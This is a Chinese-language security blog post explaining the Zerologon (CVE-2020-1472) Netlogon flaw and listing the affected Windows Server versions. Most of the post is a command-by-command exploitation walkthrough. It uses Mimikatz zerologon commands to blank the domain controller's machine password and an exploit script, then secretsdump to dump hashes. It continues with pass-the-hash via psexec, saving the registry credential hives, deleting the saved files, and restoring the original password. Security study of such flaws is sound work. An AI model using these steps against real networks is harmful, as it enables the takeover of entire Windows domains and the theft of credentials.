域滲透之Zerologon域提權漏洞

域滲透之Zerologon域提權漏洞

組件概述

Netlogon遠程協議是一個遠程過程調用(RPC)接口,用於基於域的網絡上的用戶和計算機身份驗證。Netlogon遠程協議RPC接口還用於爲備份域控制器(BDC)複製數據庫。

Netlogon遠程協議用於維護從域成員到域控制器(DC),域的DC之間以及跨域的DC之間的域關係。此RPC接口用於發現和管理這些關係。

漏洞概述

該漏洞主要是由於在使用Netlogon安全通道與域控進行連接時,由於認證協議加密部分的缺陷,導致攻擊者可以將域控管理員用戶的密碼置爲空,從而進一步實現密碼hash獲取並最終獲得管理員權限。成功的利用可以實現以管理員權限登錄域控設備,並進一步控制整個域。

漏洞範圍

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

影響Windows Server 2008R 2至Windows Server 2019的多個版本系統

漏洞復現

privilege::debug

# 檢測是否存在漏洞
lsadump::zerologon /target:<dc-ip> /account:<主機名>$

# 重置密碼
lsadump::zerologon /target:<dc-ip> /account:<主機名>$ /exploit

或使用腳本

python3 cve-2020-1472-exploit.py -n server2012 -t 10.211.55.12

-n指定域控計算機主機名

-t指定域控ip

運行exp,確定把域控機器賬戶密碼置換成空

完成後使用

python secretsdump.py 域名/[email protected] -no-pass

拖hash,獲取域管hash後使用psexec等進行pth登錄

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

# 獲取文件路徑
get system.saveget sam.save
get security.save 

# 刪除文件
del /f system.save
del /f sam.save
del /f security.save

解密本地憑據

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

$MACHINE.ACC: 的值,然後使用reinstall_original_pw.py進行還原憑據

python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca

機器名可通過nslookup 或nbtscan等netbios掃描獲取

參考

CVE-2020-1472 Netlogon權限提升漏洞分析

CVE-2020-1472 Zerologon

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章